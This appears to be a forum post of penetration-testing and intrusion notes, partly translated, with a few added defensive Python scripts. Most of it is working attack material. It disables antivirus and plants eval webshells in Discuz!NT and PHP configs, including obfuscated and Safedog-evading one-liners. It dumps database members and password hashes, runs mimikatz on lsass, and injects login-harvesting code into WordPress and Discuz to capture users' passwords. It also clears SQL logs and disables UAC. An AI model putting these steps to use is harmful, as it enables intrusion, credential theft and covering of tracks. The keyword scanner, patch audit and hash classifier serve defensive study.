How to shut down McAfee (needs SYSTEM rights; use at or psexec -s cmd.exe):
You can also upload .com files such as nc.com to get around McAfee's executable restrictions.
net stop mcafeeframework
net stop mcshield
net stop mcafeeengineservice
net stop mctaskmanager
Online VNC password cracking: http://tools88.com/safe/vnc.php
The VNC password can be pulled directly with vncdump, or read from the command line out of the registry under [HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4], value Password (the stored value is the password DES-encrypted with a fixed key, which is why it cracks instantly).
exec master..xp_cmd shell 'net user'
Executing a command through MSSQL.
Querying the MSSQL password hashes (SQL Server 2000; on 2005 and later use sys.sql_logins as above):
select name,password from master.dbo.sysxlogins

Shrinking an MSSQL database (truncate the log, then shrink; NO_LOG and TRUNCATE_ONLY were removed in SQL Server 2008):
backup log dbName with NO_LOG;
backup log dbName with TRUNCATE_ONLY;
DBCC SHRINKDATABASE(dbName);
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
Compresses game_db_201107170400.BAK into 1.rar as 200 MB volumes (-m0 stores without compression, -ep1 drops the base directory from the stored paths).

backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
Backs up the game database to D:\WebSites\game.com\UpFileList\game.bak (a path under the web root, so it can be downloaded).
Key points for penetrating Discuz!NT 3.5:
(1) Visit <site address>/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
(2) Open the rss.aspx file, copy <%@ Page Inherits="Discuz.Web.UI.RssPage" %> to a local backup, then replace it with <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
(3) Save.
(4) The one-liner backdoor is then at http://somesite.com.cn/tools/rss.aspx with password pass
d:\rar.exe a -r d:\1.rar d:\website\
Recursively compress the website directory
Note the path of rar.exe
<?php
$telok = "0${@eval($_POST[xxoo])}";
$username = "123456";
$userpwd = "123456";
$telhao = "123456";
$telinfo = "123456";
?>
PHP one-liner: a one-liner trojan inserted into a config value that is not filtered
Database-dumping technique when the web server and database server are separate
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
Because of the constraints a full shell could not be written, only a one-liner; that is actually enough for whatever you need, it is just not intuitive or convenient, for example for dumping the database.
What is used here is the shell client's expert mode (writing your own code).
ini_set('display_errors', 1);
set_time_limit(0);
error_reporting(E_ALL);
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
$i = 0;
$tmp = '';
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
    $i = $i+1;
    $tmp .= implode("::", $row)."\n";
    if(!($i%500)){ // write one file per 500 rows
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
        file_put_contents($filename,$tmp);
        $tmp = '';
    }
}
mysql_free_result($result);

// delete after downloading
ini_set('display_errors', 1);
error_reporting(E_ALL);
$i = 0;
while($i<32) {
    $i = $i+1;
    $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
    unlink($filename);
}
httprint: collect OS fingerprints
Scan all ports on 192.168.1.100
nmap -PN -sT -sV -p0-65535 192.168.1.100
host -t ns www.owasp.org   identify the name servers and obtain DNS information
host -l www.owasp.org ns1.secure.net   attempt a zone transfer for owasp.org
Netcraft DNS search service: http://searchdns.netcraft.com/?host
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (free registration required)
MSN search: http://search.msn.com  syntax: "ip:x.x.x.x" (without the quotes)
Webhosting info: http://whois.webhosting.info/  syntax: http://whois.webhosting.info/x.x.x.x/
DNSstuff: http://www.dnsstuff.com/ (several services available)
http://net-square.com/msnpawn/index.shtml (requires installation)
tomDNS: http://www.tomdns.net/ (some services are still private)
SEOlogs.com: http://www.seologs.com/ip-domains.html (reverse IP/domain lookup)
set names gb2312
Importing into the database gives the error "Data too long for column 'username' at row 1". The reason is that Chinese text is not supported.

MySQL password change
UPDATE mysql.user SET password=PASSWORD("newpass") WHERE user="mysqladmin";
update user set password=PASSWORD('antian365.com') where user='root';
flush privileges;
Advanced PHP one-liner trojan backdoors

Many advanced PHP one-liner trojans were found during intrusions. Recorded here so they can later be searched for and removed by keyword.

1.
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
// caidao (China Chopper) one-liner

2.
$filename=$_GET['xbid'];
include ($filename);
// dangerous include: compiles and runs any file as PHP

3.
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
// renames (copies) any uploaded file

4.
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");
// caidao one-liner

5. include ($uid);
// dangerous include: compiles and runs any file as PHP, via POST
// one-liner embedded in a gif

6. Typical one-liners
Backdoor code:
<?php eval_r($_POST[sb])?>
Code:
<?php @eval_r($_POST[sb])?>
// error-tolerant version
Code:
<?php assert($_POST[sb]);?>
// executes the relevant PHP statements through the expert mode of the lanker one-liner client
Code:
<?$_POST['sa']($_POST['sb']);?>
Code:
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
Code:
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
// with this one, enter the following in the "config" field when setting up the connection in the caidao one-liner client
Code:
<O>h=@eval_r($_POST[c]);</O>
Code:
<script language="php">@eval_r($_POST[sb])</script>
// one-liner that bypasses a "<?" restriction
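The post suggests hunting these by keyword. As an added example (not code from the post), here is a small Python scanner that does that: it first collapses the "p"."r"."e"."g" style concatenation so the real function name is visible, then applies signatures derived from the samples above. Rule names are my own and the sample input is constructed from sample 1.

```python
import re

# Collapse "p"."r"."e"."g" style concatenation of string literals into one literal
# so that the real function name becomes visible to the rules below.
_CONCAT = re.compile(r'''(["'])([^"'\\]*)\1[ \t]*\.[ \t]*(["'])([^"'\\]*)\3''')

def normalize(src):
    prev = None
    while prev != src:                      # repeat until no adjacent pair is left
        prev = src
        src = _CONCAT.sub(lambda m: '"' + m.group(2) + m.group(4) + '"', src)
    return src

REQ = r'\$_(?:POST|GET|REQUEST|COOKIE)'
SENSITIVE = (r'(?:eval|assert|preg_replace|create_function|system|passthru|'
             r'shell_exec|exec|copy|move_uploaded_file|file_put_contents)')

# (rule name, regex) pairs; the rules are heuristics written for the samples above
RULES = [
    ("eval/assert on request data",
     re.compile(r'@?\b(?:eval(?:_r)?|assert)\s*\(\s*' + REQ)),
    ("eval inside string interpolation",
     re.compile(r'\$\{\s*@?eval')),
    ("regex with /e modifier as first argument",
     re.compile(r'''\(\s*["']/.*?/[imsxuADSUXJ]*e[imsxuADSUXJ]*["']\s*,''')),
    ("sensitive function name stored in a variable",
     re.compile(r'''\$\w+\s*=\s*["']''' + SENSITIVE + r'''["']''')),
    ("request-controlled function call",
     re.compile(REQ + r'\s*\[[^\]]*\]\s*\(')),
    ("variable function call on request or upload data",
     re.compile(r'\$\w+\s*\(\s*(?:' + REQ + r'|\$_FILES)')),
    ("include/require of a variable path (review)",
     re.compile(r'\b(?:include|require)(?:_once)?\s*\(?\s*\$')),
    ("alternative PHP tag",
     re.compile(r'''<script\s+language\s*=\s*["']php["']''', re.I)),
]

def scan(src):
    """Return (line_number, rule_name) pairs for every line of src that matches a rule."""
    hits = []
    for n, line in enumerate(normalize(src).splitlines(), 1):
        for name, rx in RULES:
            if rx.search(line):
                hits.append((n, name))
    return hits

# Constructed input: sample 1 from the list above, as it would sit in a file
SAMPLE = '$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";\n$hh("/[discuz]/e",$_POST[\'h\'],"Access");\n'

if __name__ == "__main__":
    for n, name in scan(SAMPLE):
        print(f"line {n}: {name}")
```

The include rule fires on ordinary code too, so treat it as a review queue rather than a verdict.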
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
Detailed usage:
1. Go to the tools directory. psexec \\127.0.0.1 cmd
2. Run mimikatz
3. Run privilege::debug
4. Run inject::process lsass.exe sekurlsa.dll
5. Run @getLogonPasswords
6. The wdigest entry is the password
7. exit to quit; do not close the window directly or the system will crash.

http://www.monyer.com/demo/monyerjs/  a fairly comprehensive JS decoding site

Automatically check for high-risk system patches
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
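The one-liner greps the whole systeminfo dump with a substring match for each KB. As an added example (not from the post), the same patch audit in Python, parsing only the Hotfix(s) section and comparing whole KB ids; the systeminfo text is a constructed sample, not output from a real host.

```python
import re

# The KB list from the one-liner above
HIGH_RISK_KBS = [
    "KB2360937", "KB2478960", "KB2507938", "KB2566454", "KB2646524",
    "KB2645640", "KB2641653", "KB944653", "KB952004", "KB971657",
    "KB2620712", "KB2393802", "KB942831", "KB2503665", "KB2592799",
]

# Constructed sample of the relevant part of `systeminfo` output (not a real host);
# the last id is made up only to show the substring pitfall of `find`.
SAMPLE_SYSTEMINFO = """\
OS Name:                   Microsoft Windows Server 2008 R2 Standard
Hotfix(s):                 4 Hotfix(s) Installed.
                           [01]: KB2360937
                           [02]: kb2478960
                           [03]: KB2507938
                           [04]: KB9446530
Network Card(s):           1 NIC(s) Installed.
"""

_HOTFIX = re.compile(r'\[\d+\]:\s*(KB\d+)\b', re.I)

def installed_hotfixes(systeminfo_text):
    """KB ids listed under Hotfix(s), upper-cased so the comparison is
    case-insensitive (the one-liner uses find /i for the same reason)."""
    return {m.group(1).upper() for m in _HOTFIX.finditer(systeminfo_text)}

def missing_hotfixes(systeminfo_text, required=HIGH_RISK_KBS):
    """Required KBs that are not installed. Unlike `find`, whole ids are compared,
    so KB944653 is not reported as installed just because KB9446530 is."""
    have = installed_hotfixes(systeminfo_text)
    return [kb for kb in required if kb.upper() not in have]

if __name__ == "__main__":
    for kb in missing_hotfixes(SAMPLE_SYSTEMINFO):
        print(kb, "Not Installed!")
```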
aspx one-liner backdoor that bypasses Safedog
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
Recording WordPress login passwords from a webshell
Recording WordPress login passwords from a webshell makes further social engineering easier
Add the following at line 539 of wp-login.php:
// log password
$log_user=$_POST['log'];
$log_pwd=$_POST['pwd'];
$log_ip=$_SERVER["REMOTE_ADDR"];
$txt=$log_user.'|'.$log_pwd.'|'.$log_ip;
$txt=$txt."\r\n";
if($log_user&&$log_pwd&&$log_ip){
@fwrite(fopen('pwd.txt',"a+"),$txt);
}
The password-logging code is triggered when action=login; of course you can also put the code in the default branch of the switch...case statement.
That is, search for case 'login'
and insert it right below; the recorded passwords are written to pwd.txt.
Actually modifying wp-login.php is not a good approach; it is easily discovered. There are other methods; noting this for the record.
Code using the IIS6 file-parsing vulnerability to bypass Safedog:
;antian365.asp;antian365.jpg

Grabbing hashes from various database types to crack the highest-privilege password!
1. SQL Server 2000
SELECT password from master.dbo.sysxlogins where name='sa'
0x010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503412FD54D6119FFF04129A1D72E7C3194F7284A7F3A
0x0100 - constant header
34767D5C - salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341 - case sensitive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A - upper case hash
crack the upper case hash in 'cain and abel' and then work the case sensitive hash
SQL Server 2005:-
SELECT password_hash FROM sys.sql_logins where name='sa'
0x0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0x0100 - constant header
993BF231 - salt
5F36CC441485B35C4D84687DC02C78B0E680411F - case sensitive hash
crack the case sensitive hash in cain, try brute force and dictionary based attacks.

update:- following bernardo's comments:-
use the function fn_varbintohexstr() to cast the password to a hex string.
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password) from sysxlogins

MYSQL:-

In MySQL you can generate hashes internally using the password(), md5(), or sha1() functions. password() is the function used for MySQL's own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.

*mysql < 4.1
mysql> SELECT PASSWORD('mypass');
+--------------------+
| PASSWORD('mypass') |
+--------------------+
| 6f8c114b58f2ce9e   |
+--------------------+
*mysql >= 4.1
mysql> SELECT PASSWORD('mypass');
+-------------------------------------------+
| PASSWORD('mypass')                        |
+-------------------------------------------+
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+-------------------------------------------+

Select user, password from mysql.user
The hashes can be cracked in 'cain and abel'

Postgres:-
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called "postgres" or "pgsql").
select usename, passwd from pg_shadow;
 usename  |               passwd
----------+-------------------------------------
 testuser | md5fabb6d7172aadfda4753bf0507ed4396
use mdcrack to crack these hashes:-
wine MDCrack-sse.exe --algorithm=MD5 --append=testuser fabb6d7172aadfda4753bf0507ed4396

Oracle:-
select name, password, spare4 from sys.user$
hashes could be cracked using 'cain and abel' or thc-orakelcrackert11g
More on Oracle later, I am a bit bored....
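When auditing a login dump, the first question is which of the formats above each stored value uses, since the SQL Server 2000 and pre-4.1 MySQL layouts are the ones that should already have been migrated. As an added example (not from the post), a Python classifier that splits each value into the fields described above; the sample hashes are the ones quoted in the text, joined back together where the post wraps them.

```python
import re

# (dbms, format name, pattern, audit note); the notes summarise the breakdowns above
FORMATS = [
    ("mssql", "sqlserver2000",
     re.compile(r'^0x0100(?P<salt>[0-9a-f]{8})(?P<hash>[0-9a-f]{40})(?P<upper_hash>[0-9a-f]{40})$', re.I),
     "legacy: also stores a digest of the upper-cased password"),
    ("mssql", "sqlserver2005",
     re.compile(r'^0x0100(?P<salt>[0-9a-f]{8})(?P<hash>[0-9a-f]{40})$', re.I),
     "salted SHA-1 of the password only"),
    ("mysql", "mysql_pre41",
     re.compile(r'^(?P<hash>[0-9a-f]{16})$', re.I),
     "legacy: 16-hex-digit pre-4.1 PASSWORD() format"),
    ("mysql", "mysql_41",
     re.compile(r'^\*(?P<hash>[0-9a-f]{40})$', re.I),
     "4.1+ PASSWORD() format, unsalted double SHA-1"),
    ("postgres", "pg_md5",
     re.compile(r'^md5(?P<hash>[0-9a-f]{32})$', re.I),
     "md5 of password and username; the username is the only salt"),
]
LEGACY = {"sqlserver2000", "mysql_pre41"}

def classify(stored):
    """Identify the format of one stored hash and split out its fields."""
    value = stored.strip()
    for dbms, fmt, rx, note in FORMATS:
        m = rx.match(value)
        if m:
            return {"dbms": dbms, "format": fmt, "legacy": fmt in LEGACY,
                    "note": note, **m.groupdict()}
    return {"dbms": None, "format": "unknown", "legacy": False, "note": ""}

def audit(rows):
    """rows: iterable of (login, stored_hash). Returns logins still on a legacy format."""
    return [login for login, stored in rows if classify(stored)["legacy"]]

# The hashes quoted above, re-joined where the post wraps them across lines
SAMPLES = {
    "sa_2000": "0x010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341"
               "2FD54D6119FFF04129A1D72E7C3194F7284A7F3A",
    "sa_2005": "0x0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F",
    "mysql_old": "6f8c114b58f2ce9e",
    "mysql_new": "*6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4",
    "pg": "md5fabb6d7172aadfda4753bf0507ed4396",
}

if __name__ == "__main__":
    for name, h in SAMPLES.items():
        info = classify(h)
        print(f"{name}: {info['format']} legacy={info['legacy']} ({info['note']})")
```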

Enabling xp_cmdshell in SQL Server 2005/2008
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO
SQL Server 2008 log clearing; be sure to back up before clearing.
If SQL Express 2008 is installed on Windows Server 2008 Standard, delete this:
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin

For versions before SQL Server 2008:
SQL Server 2005:
delete X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
SQL Server 2000:
clear the corresponding entries under the registry key HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\.

This post was last edited by simeon on 2013-1-3 09:51
Windows 2008 file permission modification
1. http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
2. http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
Step one: first check whether the right-click menu has "Take ownership as administrator"; if there is no "Take ownership as administrator":

Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\*\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\*\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"

[HKEY_CLASSES_ROOT\Directory\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"

Import the Win7 right-click "Take ownership as administrator" .reg file
Step two: search the C:\Windows directory for "notepad.exe"; you should find four "notepad.exe" and four "notepad.exe.mui".
1. The "notepad.exe" under C:\Windows does not need replacing
2. The "notepad.exe" under C:\Windows\System32 does not need replacing
3. Ignore the four "notepad.exe.mui"
4. Mainly replace the "notepad.exe" in the two folders C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4 and
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a
Replacement method: first take administrator ownership of these two folders, then rename "Notepad2.exe" to "notepad.exe" and put it into both folders;
after replacing, go back to the desktop, create a new txt file and open it to see whether it has changed.
Disabling the security policy in Windows 2008:
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Modify client.php in the uc_client directory: below
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
insert the following code; csslog.php is then generated automatically under the site's ./data/cache/ directory.
You can add a view.php in the ipdata directory to view the records; the password is falw
if(getenv('HTTP_CLIENT_IP')) {
    $onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
    $onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR')) {
    $onlineip = getenv('REMOTE_ADDR');
} else {
    $onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
}
$showtime=date("Y-m-d H:i:s");
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
$handle=fopen('./data/cache/csslog.php','a+');
$write=fwrite($handle,$record);